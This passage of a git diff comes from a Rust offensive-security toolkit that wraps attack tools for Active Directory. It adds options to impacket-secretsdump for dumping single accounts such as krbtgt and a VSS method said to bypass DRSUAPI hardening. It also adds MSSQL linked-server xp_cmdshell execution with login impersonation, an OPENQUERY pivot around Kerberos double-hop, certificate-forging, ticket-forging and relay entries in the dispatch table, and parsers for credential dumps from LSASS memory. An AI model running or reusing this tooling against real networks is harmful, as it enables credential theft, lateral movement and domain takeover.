"use_vss").unwrap_or(false); let timeout_minutes = optional_i64(args, "timeout_minutes"); let timeout_secs = timeout_minutes.map(|m| (m * 60) as u64).unwrap_or(180); @@ -28,6 +30,7 @@ pub async fn secretsdump(args: &Value) -> Result { let mut cmd = CommandBuilder::new("impacket-secretsdump"); cmd = cmd.flag_opt("-dc-ip", dc_ip); + cmd = cmd.flag_opt("-just-dc-user", just_dc_user); if use_kerberos { cmd = cmd.arg("-k").arg("-no-pass"); @@ -38,6 +41,10 @@ pub async fn secretsdump(args: &Value) -> Result { cmd = cmd.args(extra_args); } + if use_vss { + cmd = cmd.arg("-use-vss"); + } + cmd = cmd.arg(&auth_string); cmd.timeout_secs(timeout_secs).execute().await @@ -160,6 +167,8 @@ mod tests { assert_eq!(optional_str(&args, "dc_ip"), Some("192.168.58.2")); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/credentials.rs b/ares-tools/src/credentials.rs index 8bc12d33..1f81806f 100644 --- a/ares-tools/src/credentials.rs +++ b/ares-tools/src/credentials.rs @@ -29,6 +29,15 @@ pub fn hash_args(hash: &str) -> Vec { vec!["-hashes".to_string(), h] } +/// Extract the NT hash from a hash string that may be in `LM:NT` colon form. +/// +/// `impacket-ticketer -nthash` rejects the concatenated `LM:NT` form with +/// `'Odd-length string'` because it expects a 32-char hex NT hash. This helper +/// returns the right-most colon-delimited segment, trimmed. +pub fn nt_hash_only(hash: &str) -> &str { + hash.rsplit(':').next().unwrap_or(hash).trim() +} + /// Build netexec-style credential args: `-u user -p pass -d domain` or `-u user -H hash`. pub fn netexec_creds( username: Option<&str>, @@ -140,6 +149,33 @@ mod tests { assert_eq!(args, vec!["-hashes", "aad3b435:aabbccdd"]); } + #[test] + fn nt_hash_only_strips_lm_half() { + assert_eq!( + nt_hash_only("aad3b435b51404eeaad3b435b51404ee:d350c5900e26d2c95f501e94cf95b078"), + "d350c5900e26d2c95f501e94cf95b078" + ); + } + + #[test] + fn nt_hash_only_passes_through_plain_nt() { + assert_eq!( + nt_hash_only("d350c5900e26d2c95f501e94cf95b078"), + "d350c5900e26d2c95f501e94cf95b078" + ); + } + + #[test] + fn nt_hash_only_trims_whitespace() { + assert_eq!(nt_hash_only(" abcd "), "abcd"); + assert_eq!(nt_hash_only("aad3b435:abcd\n"), "abcd"); + } + + #[test] + fn nt_hash_only_empty_string() { + assert_eq!(nt_hash_only(""), ""); + } + #[test] fn netexec_creds_password_auth() { let args = netexec_creds(Some("admin"), Some("P@ss"), None, Some("CONTOSO")); diff --git a/ares-tools/src/executor.rs b/ares-tools/src/executor.rs index 2cb3ff50..6ea89c77 100644 --- a/ares-tools/src/executor.rs +++ b/ares-tools/src/executor.rs @@ -15,6 +15,7 @@ pub struct CommandBuilder { env_vars: Vec<(String, String)>, timeout: Duration, stdin_data: Option, + cwd: Option, } impl CommandBuilder { @@ -25,6 +26,7 @@ impl CommandBuilder { env_vars: Vec::new(), timeout: DEFAULT_TIMEOUT, stdin_data: None, + cwd: None, } } @@ -79,6 +81,11 @@ impl CommandBuilder { self } + pub fn current_dir(mut self, dir: impl Into) -> Self { + self.cwd = Some(dir.into()); + self + } + pub async fn execute(self) -> Result { #[cfg(test)] { @@ -93,6 +100,10 @@ impl CommandBuilder { let mut cmd = Command::new(&self.program); cmd.args(&self.args); + if let Some(ref dir) = self.cwd { + cmd.current_dir(dir); + } + for (key, value) in &self.env_vars { cmd.env(key, value); } diff --git a/ares-tools/src/lateral/execution.rs b/ares-tools/src/lateral/execution.rs index 3e586d64..39383a5c 100644 --- a/ares-tools/src/lateral/execution.rs +++ b/ares-tools/src/lateral/execution.rs @@ -225,6 +225,7 @@ pub async fn xfreerdp(args: &Value) -> Result { cmd.arg("/cert-ignore") .arg("+auth-only") + .env("HOME", "/root") .timeout_secs(30) .execute() .await @@ -260,7 +261,9 @@ pub async fn ssh_with_password(args: &Value) -> Result { /// Dump secrets from a remote host via impacket-secretsdump with Kerberos auth. /// /// Required args: `target`, `username`, `domain`, `ticket_path` -/// Optional args: `dc_ip`, `target_ip`, `timeout_minutes` +/// Optional args: `dc_ip`, `target_ip`, `timeout_minutes`, +/// `just_dc_user` (single account, e.g. `krbtgt`), +/// `use_vss` (bool — use VSS method to bypass DRSUAPI hardening) pub async fn secretsdump_kerberos(args: &Value) -> Result { let target = required_str(args, "target")?; let username = required_str(args, "username")?; @@ -268,22 +271,28 @@ pub async fn secretsdump_kerberos(args: &Value) -> Result { let ticket_path = required_str(args, "ticket_path")?; let dc_ip = optional_str(args, "dc_ip"); let target_ip = optional_str(args, "target_ip"); + let just_dc_user = optional_str(args, "just_dc_user"); + let use_vss = crate::args::optional_bool(args, "use_vss").unwrap_or(false); let timeout_minutes = optional_i64(args, "timeout_minutes").unwrap_or(3); let timeout_secs = (timeout_minutes * 60) as u64; let target_str = format!("{domain}/{username}@{target}"); let (env_key, env_val) = credentials::kerberos_env(ticket_path); - CommandBuilder::new("impacket-secretsdump") + let mut cmd = CommandBuilder::new("impacket-secretsdump") .arg("-k") .arg("-no-pass") .arg(&target_str) .flag_opt("-dc-ip", dc_ip) .flag_opt("-target-ip", target_ip) - .env(env_key, env_val) - .timeout_secs(timeout_secs) - .execute() - .await + .flag_opt("-just-dc-user", just_dc_user) + .env(env_key, env_val); + + if use_vss { + cmd = cmd.arg("-use-vss"); + } + + cmd.timeout_secs(timeout_secs).execute().await } #[cfg(test)] @@ -292,6 +301,8 @@ mod tests { use crate::credentials; use serde_json::json; + // --- psexec --- + #[test] fn psexec_requires_target() { let args = json!({"username": "admin"}); @@ -358,6 +369,8 @@ mod tests { assert_eq!(extra_args, vec!["-hashes", ":aabbccdd"]); } + // --- psexec_kerberos --- + #[test] fn psexec_kerberos_target_format() { let args = json!({ @@ -432,6 +445,8 @@ mod tests { assert_eq!(optional_str(&args, "dc_ip"), Some("192.168.58.1")); } + // --- wmiexec --- + #[test] fn wmiexec_requires_target() { let args = json!({"username": "admin"}); @@ -451,6 +466,8 @@ mod tests { assert_eq!(command, "whoami"); } + // --- wmiexec_kerberos --- + #[test] fn wmiexec_kerberos_target_format() { let domain = "contoso.local"; @@ -472,6 +489,8 @@ mod tests { assert_eq!(command, "whoami"); } + // --- smbexec --- + #[test] fn smbexec_requires_target() { let args = json!({"username": "admin"}); @@ -491,6 +510,8 @@ mod tests { assert_eq!(command, "whoami"); } + // --- smbexec_kerberos --- + #[test] fn smbexec_kerberos_target_format() { let domain = "north.contoso.local"; @@ -503,6 +524,8 @@ mod tests { ); } + // --- evil_winrm --- + #[test] fn evil_winrm_default_command() { let args = json!({"target": "192.168.58.1", "username": "admin"}); @@ -571,6 +594,8 @@ mod tests { assert!(used_flag.is_empty()); } + // --- xfreerdp --- + #[test] fn xfreerdp_target_format() { let target = "192.168.58.1"; @@ -621,6 +646,8 @@ mod tests { assert_eq!(auth_arg, "/pth:aabbccdd"); } + // --- ssh_with_password --- + #[test] fn ssh_user_host_format() { let username = "root"; @@ -667,6 +694,8 @@ mod tests { assert!(optional_str(&args, "port").is_none()); } + // --- secretsdump_kerberos --- + #[test] fn secretsdump_kerberos_target_format() { let domain = "contoso.local"; @@ -725,6 +754,8 @@ mod tests { assert!(required_str(&args, "ticket_path").is_err()); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/lateral/kerberos.rs b/ares-tools/src/lateral/kerberos.rs index 5b042ea7..7a1cc884 100644 --- a/ares-tools/src/lateral/kerberos.rs +++ b/ares-tools/src/lateral/kerberos.rs @@ -123,6 +123,8 @@ mod tests { assert!(optional_str(&args, "dc_ip").is_none()); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/lateral/mssql.rs b/ares-tools/src/lateral/mssql.rs index bc6a9113..9f8e0bb6 100644 --- a/ares-tools/src/lateral/mssql.rs +++ b/ares-tools/src/lateral/mssql.rs @@ -98,15 +98,32 @@ pub async fn mssql_enum_linked_servers(args: &Value) -> Result { mssql_query(mssql_from_args(args)?, "EXEC sp_linkedservers;").await } +/// Wrap `inner_query` in a source-side `EXECUTE AS LOGIN` if requested. +/// +/// Cross-forest linked-server hops fail when the connecting principal can't +/// double-hop (Kerberos delegation/SID filtering). Two source-side workarounds: +/// - `EXECUTE AS LOGIN = 'sa'; ` — runs the hop under sa's mapped login +/// (requires SeImpersonatePrivilege or IMPERSONATE on the target login) +/// - `SELECT * FROM OPENQUERY(...)` — uses the linked-server's configured +/// `sp_addlinkedsrvlogin` mapping (separate path: see `mssql_openquery`) +fn wrap_execute_as(inner_query: &str, impersonate_user: Option<&str>) -> String { + match impersonate_user { + Some(user) => format!("EXECUTE AS LOGIN = '{user}'; {inner_query}"), + None => inner_query.to_string(), + } +} + /// Execute a query on a linked MSSQL server. /// /// Required args: `target`, `username`, `linked_server`, `query` -/// Optional args: `password`, `domain`, `windows_auth` +/// Optional args: `password`, `domain`, `windows_auth`, `impersonate_user` pub async fn mssql_exec_linked(args: &Value) -> Result { let linked_server = required_str(args, "linked_server")?; let query = required_str(args, "query")?; + let impersonate_user = optional_str(args, "impersonate_user"); - let full_query = format!("EXEC ('{query}') AT [{linked_server}];"); + let hop = format!("EXEC ('{query}') AT [{linked_server}];"); + let full_query = wrap_execute_as(&hop, impersonate_user); mssql_query(mssql_from_args(args)?, &full_query).await } @@ -114,14 +131,16 @@ pub async fn mssql_exec_linked(args: &Value) -> Result { /// Enable xp_cmdshell on a linked MSSQL server. /// /// Required args: `target`, `username`, `linked_server` -/// Optional args: `password`, `domain`, `windows_auth` +/// Optional args: `password`, `domain`, `windows_auth`, `impersonate_user` pub async fn mssql_linked_enable_xpcmdshell(args: &Value) -> Result { let linked_server = required_str(args, "linked_server")?; + let impersonate_user = optional_str(args, "impersonate_user"); - let full_query = format!( + let hop = format!( "EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE; \ EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [{linked_server}];" ); + let full_query = wrap_execute_as(&hop, impersonate_user); mssql_query(mssql_from_args(args)?, &full_query).await } @@ -129,12 +148,35 @@ pub async fn mssql_linked_enable_xpcmdshell(args: &Value) -> Result /// Execute a command via xp_cmdshell on a linked MSSQL server. /// /// Required args: `target`, `username`, `linked_server`, `command` -/// Optional args: `password`, `domain`, `windows_auth` +/// Optional args: `password`, `domain`, `windows_auth`, `impersonate_user` pub async fn mssql_linked_xpcmdshell(args: &Value) -> Result { let linked_server = required_str(args, "linked_server")?; let command = required_str(args, "command")?; + let impersonate_user = optional_str(args, "impersonate_user"); + + let hop = format!("EXEC ('xp_cmdshell ''{command}''') AT [{linked_server}];"); + let full_query = wrap_execute_as(&hop, impersonate_user); + + mssql_query(mssql_from_args(args)?, &full_query).await +} - let full_query = format!("EXEC ('xp_cmdshell ''{command}''') AT [{linked_server}];"); +/// Query a linked MSSQL server via OPENQUERY using the linked server's +/// configured remote login (sp_addlinkedsrvlogin) — bypasses Kerberos +/// double-hop. This is the cross-forest pivot path when the connecting +/// principal cannot delegate but the linked server has an explicit login +/// mapping (e.g. `RPC OUT = ON` plus a stored credential). +/// +/// Required args: `target`, `username`, `linked_server`, `query` +/// Optional args: `password`, `domain`, `windows_auth`, `impersonate_user` +pub async fn mssql_openquery(args: &Value) -> Result { + let linked_server = required_str(args, "linked_server")?; + let query = required_str(args, "query")?; + let impersonate_user = optional_str(args, "impersonate_user"); + + // OPENQUERY's inner string uses single quotes; double any embedded ones. + let escaped = query.replace('\'', "''"); + let openq = format!("SELECT * FROM OPENQUERY([{linked_server}], '{escaped}');"); + let full_query = wrap_execute_as(&openq, impersonate_user); mssql_query(mssql_from_args(args)?, &full_query).await } @@ -157,6 +199,8 @@ mod tests { use crate::credentials; use serde_json::json; + // --- mssql_from_args required fields --- + #[test] fn mssql_requires_target() { let args = json!({"username": "sa"}); @@ -187,6 +231,8 @@ mod tests { assert!(windows_auth); } + // --- mssql_base auth string via impacket_target --- + #[test] fn mssql_auth_string_with_domain_and_password() { let auth_str = @@ -206,12 +252,16 @@ mod tests { assert_eq!(auth_str, "CONTOSO/sa@192.168.58.1"); } + // --- mssql_command --- + #[test] fn mssql_command_requires_command() { let args = json!({"target": "192.168.58.1", "username": "sa"}); assert!(required_str(&args, "command").is_err()); } + // --- mssql_enable_xp_cmdshell --- + #[test] fn enable_xp_cmdshell_impersonate_query_format() { let user = "sa"; @@ -240,6 +290,8 @@ mod tests { assert!(!query.starts_with("EXECUTE AS LOGIN")); } + // --- mssql_impersonate --- + #[test] fn impersonate_query_format() { let impersonate_user = "sa"; @@ -268,6 +320,8 @@ mod tests { assert!(required_str(&args, "query").is_err()); } + // --- mssql_exec_linked --- + #[test] fn linked_server_query_format() { let linked_server = "SQL02"; @@ -296,6 +350,8 @@ mod tests { assert!(required_str(&args, "query").is_err()); } + // --- mssql_linked_enable_xpcmdshell --- + #[test] fn linked_enable_xpcmdshell_format() { let linked_server = "SQL02"; @@ -307,6 +363,8 @@ mod tests { assert!(full_query.contains("xp_cmdshell")); } + // --- mssql_linked_xpcmdshell --- + #[test] fn linked_xpcmdshell_format() { let linked_server = "SQL02"; @@ -325,6 +383,8 @@ mod tests { assert!(required_str(&args, "command").is_err()); } + // --- mssql_ntlm_coerce --- + #[test] fn ntlm_coerce_xp_dirtree_format() { let listener_ip = "192.168.58.5"; @@ -344,6 +404,8 @@ mod tests { assert!(required_str(&args, "listener_ip").is_err()); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/lateral/pth.rs b/ares-tools/src/lateral/pth.rs index 1d251bd3..0a89a787 100644 --- a/ares-tools/src/lateral/pth.rs +++ b/ares-tools/src/lateral/pth.rs @@ -110,6 +110,8 @@ mod tests { use crate::args::{optional_str, required_str}; use serde_json::json; + // --- pth_cred_string --- + #[test] fn cred_string_with_domain() { let result = pth_cred_string(Some("CONTOSO"), "admin", "aabbccdd"); @@ -128,6 +130,8 @@ mod tests { assert_eq!(result, "admin%aabbccdd"); } + // --- pth_winexe --- + #[test] fn pth_winexe_requires_target() { let args = json!({"username": "admin", "hash": "aabbccdd"}); @@ -159,6 +163,8 @@ mod tests { assert_eq!(format!("//{target}"), "//192.168.58.1"); } + // --- pth_smbclient --- + #[test] fn pth_smbclient_default_share() { let args = json!({"target": "192.168.58.1", "username": "admin", "hash": "aa"}); @@ -192,6 +198,8 @@ mod tests { assert_eq!(format!("//{target}/{share}"), "//192.168.58.1/C$"); } + // --- pth_rpcclient --- + #[test] fn pth_rpcclient_default_command() { let args = json!({"target": "192.168.58.1", "username": "admin", "hash": "aa"}); @@ -199,6 +207,8 @@ mod tests { assert_eq!(command, "getusername"); } + // --- pth_wmic --- + #[test] fn pth_wmic_default_query() { let args = json!({"target": "192.168.58.1", "username": "admin", "hash": "aa"}); @@ -239,6 +249,8 @@ mod tests { assert_eq!(cred, "CONTOSO/admin%aad3b435:aabbccdd"); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/lib.rs b/ares-tools/src/lib.rs index 46f90016..4dee3867 100644 --- a/ares-tools/src/lib.rs +++ b/ares-tools/src/lib.rs @@ -83,6 +83,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result "adidnsdump" => recon::adidnsdump(arguments).await, "save_users_to_file" => recon::save_users_to_file(arguments).await, "smbclient_kerberos_shares" => recon::smbclient_kerberos_shares(arguments).await, + "ldap_acl_enumeration" => recon::ldap_acl_enumeration(arguments).await, // ── Credential Access ─────────────────────────────────────── "kerberoast" => credential_access::kerberoast(arguments).await, @@ -92,6 +93,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result } "secretsdump" => credential_access::secretsdump(arguments).await, "lsassy" => credential_access::lsassy(arguments).await, + "smb_login_check" => credential_access::smb_login_check(arguments).await, "domain_admin_checker" => credential_access::domain_admin_checker(arguments).await, "gpp_password_finder" => credential_access::gpp_password_finder(arguments).await, "sysvol_script_search" => credential_access::sysvol_script_search(arguments).await, @@ -135,6 +137,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result lateral::mssql_linked_enable_xpcmdshell(arguments).await } "mssql_linked_xpcmdshell" => lateral::mssql_linked_xpcmdshell(arguments).await, + "mssql_openquery" => lateral::mssql_openquery(arguments).await, "mssql_ntlm_coerce" => lateral::mssql_ntlm_coerce(arguments).await, // ── Privilege Escalation ──────────────────────────────────── @@ -144,6 +147,11 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result "certipy_shadow" => privesc::certipy_shadow(arguments).await, "certipy_template_esc4" => privesc::certipy_template_esc4(arguments).await, "certipy_esc4_full_chain" => privesc::certipy_esc4_full_chain(arguments).await, + "certipy_ca" => privesc::certipy_ca(arguments).await, + "certipy_forge" => privesc::certipy_forge(arguments).await, + "certipy_retrieve" => privesc::certipy_retrieve(arguments).await, + "certipy_esc7_full_chain" => privesc::certipy_esc7_full_chain(arguments).await, + "certipy_relay" => privesc::certipy_relay(arguments).await, "find_delegation" => privesc::find_delegation(arguments).await, "s4u_attack" => privesc::s4u_attack(arguments).await, "generate_golden_ticket" => privesc::generate_golden_ticket(arguments).await, @@ -154,6 +162,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result "raise_child" => privesc::raise_child(arguments).await, "extract_trust_key" => privesc::extract_trust_key(arguments).await, "create_inter_realm_ticket" => privesc::create_inter_realm_ticket(arguments).await, + "forge_inter_realm_and_dump" => privesc::forge_inter_realm_and_dump(arguments).await, "get_sid" => privesc::get_sid(arguments).await, "dnstool" => privesc::dnstool(arguments).await, "gmsa_dump_passwords" => privesc::gmsa_dump_passwords(arguments).await, @@ -187,6 +196,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result "ntlmrelayx_to_adcs" => coercion::ntlmrelayx_to_adcs(arguments).await, "ntlmrelayx_to_smb" => coercion::ntlmrelayx_to_smb(arguments).await, "ntlmrelayx_multirelay" => coercion::ntlmrelayx_multirelay(arguments).await, + "relay_and_coerce" => coercion::relay_and_coerce(arguments).await, _ => Err(anyhow::anyhow!("unknown tool: {tool_name}")), } diff --git a/ares-tools/src/parsers/certipy.rs b/ares-tools/src/parsers/certipy.rs index 724f8e90..80f1ab0b 100644 --- a/ares-tools/src/parsers/certipy.rs +++ b/ares-tools/src/parsers/certipy.rs @@ -9,11 +9,22 @@ const ESC_TYPES: &[&str] = &[ ]; pub fn parse_certipy_find(output: &str, params: &Value) -> Vec { - let target_ip = params - .get("target") - .or_else(|| params.get("target_ip")) + // ca_host_ip is the ADCS CA server IP (where certs are enrolled). + // target/target_ip is the DC IP used for LDAP queries. + // For vuln target, prefer ca_host_ip so exploitation targets the CA, not the DC. + let ca_host_ip = params + .get("ca_host_ip") .and_then(|v| v.as_str()) .unwrap_or(""); + let target_ip = if !ca_host_ip.is_empty() { + ca_host_ip + } else { + params + .get("target") + .or_else(|| params.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or("") + }; let domain = params.get("domain").and_then(|v| v.as_str()).unwrap_or(""); @@ -29,18 +40,24 @@ pub fn parse_certipy_find(output: &str, params: &Value) -> Vec { // Strategy 2: Look for "ESCn :" patterns (certipy find -vulnerable output) // These appear as "ESC1 : 'DOMAIN\\Group' can enroll..." for esc_type in ESC_TYPES { + let esc_upper = esc_type.to_uppercase(); let found = if has_vuln_header { - // Standard certipy output with vulnerability section - output_lower.contains(esc_type) + // Use word-boundary-aware matching to avoid false positives + // (e.g. "esc1" matching inside "esc13" or "esc15"). + // Certipy outputs "ESCn :" or "ESCn:" patterns. + output.contains(&format!("{esc_upper} :")) + || output.contains(&format!("{esc_upper}:")) + || output.contains(&format!("{esc_upper} ")) + || esc_word_boundary_match(&output_lower, esc_type) } else { // Also detect ESC patterns without the header — certipy sometimes // outputs vulnerability info inline with template details. // Look for "ESCn" followed by ":" or "vulnerability" on the same or // nearby lines. - let esc_upper = esc_type.to_uppercase(); output.contains(&format!("{esc_upper} :")) || output.contains(&format!("{esc_upper}:")) - || (output_lower.contains(esc_type) && output_lower.contains("vulnerab")) + || (esc_word_boundary_match(&output_lower, esc_type) + && output_lower.contains("vulnerab")) }; if found { @@ -59,6 +76,9 @@ pub fn parse_certipy_find(output: &str, params: &Value) -> Vec { if let Some(ref tmpl) = template_name { details["template_name"] = json!(tmpl); } + if !ca_host_ip.is_empty() { + details["ca_host"] = json!(ca_host_ip); + } vulns.push(json!({ "vuln_id": format!("adcs_{}_{}", esc_type, target_ip), @@ -75,6 +95,23 @@ pub fn parse_certipy_find(output: &str, params: &Value) -> Vec { vulns } +/// Check if `esc_type` (e.g. "esc1") appears as a whole word in `text`. +/// Prevents "esc1" from matching inside "esc13" or "esc15". +fn esc_word_boundary_match(text: &str, esc_type: &str) -> bool { + let mut start = 0; + while let Some(pos) = text[start..].find(esc_type) { + let abs_pos = start + pos; + let end_pos = abs_pos + esc_type.len(); + // Check that the character after the match is not a digit + let after_ok = end_pos >= text.len() || !text.as_bytes()[end_pos].is_ascii_digit(); + if after_ok { + return true; + } + start = abs_pos + 1; + } + false +} + /// Extract CA name from certipy output. fn extract_ca_name(output: &str) -> Option { for line in output.lines() { @@ -117,12 +154,14 @@ fn extract_template_for_esc(output: &str, esc_type: &str) -> Option { /// Priority for ESC types (lower = more urgent). fn esc_priority(esc_type: &str) -> i32 { match esc_type { - "esc1" | "esc6" => 1, // Direct enrollment → DA cert - "esc4" | "esc8" => 2, // Template abuse / relay - "esc2" | "esc3" => 3, // Certificate agent - "esc7" | "esc9" => 4, // ManageCA / UPN spoof - "esc5" => 5, // Golden cert (requires CA compromise first) - _ => 6, // ESC10-15 and unknown + "esc1" | "esc6" => 1, // Direct enrollment → DA cert + "esc4" | "esc8" => 2, // Template abuse / relay + "esc2" | "esc3" | "esc15" => 3, // Certificate agent / app policy OID + "esc7" | "esc9" | "esc10" => 4, // ManageCA / UPN spoof / weak mapping + "esc11" => 4, // RPC relay (needs coercion) + "esc5" => 5, // Golden cert (requires CA compromise first) + "esc13" => 4, // Issuance policy + _ => 6, // ESC14 and unknown } } @@ -237,12 +276,13 @@ mod tests { assert_eq!(esc_priority("esc8"), 2); assert_eq!(esc_priority("esc2"), 3); assert_eq!(esc_priority("esc3"), 3); + assert_eq!(esc_priority("esc15"), 3); assert_eq!(esc_priority("esc7"), 4); assert_eq!(esc_priority("esc9"), 4); + assert_eq!(esc_priority("esc10"), 4); + assert_eq!(esc_priority("esc11"), 4); + assert_eq!(esc_priority("esc13"), 4); assert_eq!(esc_priority("esc5"), 5); - assert_eq!(esc_priority("esc10"), 6); - assert_eq!(esc_priority("esc11"), 6); - assert_eq!(esc_priority("esc13"), 6); assert_eq!(esc_priority("unknown"), 6); } @@ -338,4 +378,48 @@ mod tests { assert_eq!(vulns.len(), 1); assert_eq!(vulns[0]["vuln_type"], "adcs_esc8"); } + + #[test] + fn parse_certipy_esc13_does_not_false_positive_esc1() { + // ESC13 should not trigger false positive for ESC1 + let output = "[!] Vulnerabilities\nESC13 : Issuance Policy linked to group"; + let params = json!({"target": "192.168.58.10"}); + let vulns = parse_certipy_find(output, ¶ms); + assert_eq!(vulns.len(), 1); + assert_eq!(vulns[0]["vuln_type"], "adcs_esc13"); + } + + #[test] + fn parse_certipy_ca_host_ip_used_as_target() { + let output = "[!] Vulnerabilities\nESC1 : enrollee supplies subject"; + let params = json!({ + "target_ip": "192.168.58.10", // DC IP + "ca_host_ip": "192.168.58.50", // CA IP + "domain": "contoso.local" + }); + let vulns = parse_certipy_find(output, ¶ms); + assert_eq!(vulns.len(), 1); + // Should use ca_host_ip, not target_ip + assert_eq!(vulns[0]["target"], "192.168.58.50"); + assert_eq!(vulns[0]["vuln_id"], "adcs_esc1_192.168.58.50"); + assert_eq!(vulns[0]["details"]["ca_host"], "192.168.58.50"); + } + + #[test] + fn esc_word_boundary_match_basic() { + assert!(super::esc_word_boundary_match("esc1 : vulnerable", "esc1")); + assert!(super::esc_word_boundary_match("esc1:", "esc1")); + assert!(!super::esc_word_boundary_match( + "esc13 : vulnerable", + "esc1" + )); + assert!(!super::esc_word_boundary_match( + "esc15 : vulnerable", + "esc1" + )); + assert!(super::esc_word_boundary_match( + "esc13 : vulnerable", + "esc13" + )); + } } diff --git a/ares-tools/src/parsers/credential_tools.rs b/ares-tools/src/parsers/credential_tools.rs index 3a0d7d60..5ec356e9 100644 --- a/ares-tools/src/parsers/credential_tools.rs +++ b/ares-tools/src/parsers/credential_tools.rs @@ -7,13 +7,43 @@ use std::sync::LazyLock; // ── Lsassy ────────────────────────────────────────────────────────────────── +/// Real ANSI escape sequences (e.g. `\x1b[1;33m`). +static ANSI_ESC_RE: LazyLock = + LazyLock::new(|| Regex::new(r"\x1b\[[0-9;]*[a-zA-Z]").expect("ansi esc regex")); + +/// Bare-text ANSI leftovers when ESC bytes are stripped during transport. +/// Matches things like `[1;33m`, `[0m`, `[32m` — but NOT arbitrary bracketed +/// text like `[LSASSY]` or `[NT]`. +static ANSI_BARE_RE: LazyLock = + LazyLock::new(|| Regex::new(r"\[\d+(?:;\d+)*m").expect("ansi bare regex")); + +/// Match the first plausibly-clean `DOMAIN\username` token in a line. +/// +/// Domain: starts with alphanumeric, allows alphanumerics/`._-`, no spaces or +/// brackets — keeps us from sucking up `"SMB 192.168.58.10 445 DC01 [+] contoso.local"` +/// as the "domain" when the real domain prefix appears later in the line. +/// +/// Captures: 1=domain, 2=username, 3=remainder of line. +static LSASSY_DOMAIN_USER_RE: LazyLock = LazyLock::new(|| { + Regex::new(r"(?:^|[\s\]\)>])([A-Za-z0-9][A-Za-z0-9._-]*)\\([A-Za-z0-9._$@-]+)(.*)$") + .expect("lsassy domain\\user regex") +}); + +/// Match `[NT] ` (with optional `[SHA1] ` suffix) in lsassy output. +/// Captures: 1=NT hash (32 hex chars). +static LSASSY_NT_HASH_RE: LazyLock = + LazyLock::new(|| Regex::new(r"\[NT\]\s+([0-9a-fA-F]{32})\b").expect("lsassy NT hash regex")); + /// Parse lsassy output for cleartext credentials and NTLM hashes. /// -/// Lsassy dumps credentials from LSASS memory: +/// Handles several output flavors: /// ```text -/// CONTOSO\alice.johnson Password123 -/// CONTOSO\bob.smith 31d6...hash... +/// CONTOSO\alice Password123 +/// CONTOSO\bob aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 +/// SMB 192.168.58.10 445 DC01 [LSASSY] CONTOSO\carol [NT] 31d6... [SHA1] f9e3... /// ``` +/// ANSI color codes (real ESC sequences and bare-text leftovers like `[1;33m`) +/// are stripped before parsing. pub fn parse_lsassy(output: &str, params: &Value) -> (Vec, Vec) { let default_domain = params.get("domain").and_then(|v| v.as_str()).unwrap_or(""); @@ -21,19 +51,15 @@ pub fn parse_lsassy(output: &str, params: &Value) -> (Vec, Vec) { let mut creds = Vec::new(); for line in output.lines() { + let line = strip_ansi(line.trim()); let line = line.trim(); - // Skip noise lines - if line.is_empty() - || line.starts_with('[') - || line.starts_with("INFO") - || line.starts_with("WARNING") - || line.starts_with("ERROR") - || line.contains("authentication") - { + if line.is_empty() { + continue; + } + if is_lsassy_noise(line) { continue; } - // Try DOMAIN\username:password or DOMAIN\username password if let Some((domain, username, secret)) = parse_lsassy_line(line) { let domain = if domain.is_empty() { default_domain.to_string() @@ -65,35 +91,86 @@ pub fn parse_lsassy(output: &str, params: &Value) -> (Vec, Vec) { (hashes, creds) } +/// Strip ANSI color codes and bare-text leftovers (when ESC bytes were dropped). +fn strip_ansi(s: &str) -> String { + let s = ANSI_ESC_RE.replace_all(s, ""); + ANSI_BARE_RE.replace_all(&s, "").to_string() +} + +/// Identify lines that lsassy emits but contain no credential we can parse. +fn is_lsassy_noise(line: &str) -> bool { + line.starts_with("INFO") + || line.starts_with("WARNING") + || line.starts_with("ERROR") + || line.contains("authentication") + // Lines that are pure status (start with `[`/`(`) and contain no `\` + // can't carry a DOMAIN\user pair — skip them up-front. + || ((line.starts_with('[') || line.starts_with('(')) + && !line.contains('\\')) +} + fn parse_lsassy_line(line: &str) -> Option<(String, String, String)> { - // Format: DOMAIN\username password OR DOMAIN\username:password - if let Some(backslash_pos) = line.find('\\') { - let domain = line[..backslash_pos].trim().to_string(); - let rest = &line[backslash_pos + 1..]; - - // Try splitting on whitespace first (most common lsassy format) - // This must come before colon check because NTLM hashes contain colons - let parts: Vec<&str> = rest.splitn(2, char::is_whitespace).collect(); - if parts.len() == 2 && !parts[1].trim().is_empty() { - let username = parts[0].trim().to_string(); - let secret = parts[1].trim().to_string(); - if !username.is_empty() && !secret.is_empty() { - return Some((domain, username, secret)); + // Special-case `[NT] hash` form first — it's unambiguous and the regex + // anchors are friendlier to a clean DOMAIN\user lookahead. + if let Some(nt_caps) = LSASSY_NT_HASH_RE.captures(line) { + if let Some(caps) = LSASSY_DOMAIN_USER_RE.captures(line) { + let domain = caps.get(1)?.as_str(); + let username = caps.get(2)?.as_str(); + if is_clean_domain(domain) && !username.is_empty() { + return Some(( + domain.to_string(), + username.to_string(), + nt_caps[1].to_string(), + )); } } + } - // Fallback: colon-separated (DOMAIN\username:password) - if let Some(colon_pos) = rest.find(':') { - let username = rest[..colon_pos].trim().to_string(); - let after_colon = rest[colon_pos + 1..].trim().to_string(); - if !username.is_empty() && !after_colon.is_empty() { - return Some((domain, username, after_colon)); - } + // General DOMAIN\user form: parse the first clean DOMAIN\user token, then + // pull a secret out of the remainder. + let caps = LSASSY_DOMAIN_USER_RE.captures(line)?; + let domain = caps.get(1)?.as_str(); + let username = caps.get(2)?.as_str(); + let rest = caps.get(3)?.as_str(); + + if !is_clean_domain(domain) || username.is_empty() { + return None; + } + + // Colon-prefixed (DOMAIN\user:secret) — preserve full LM:NT pair. + if 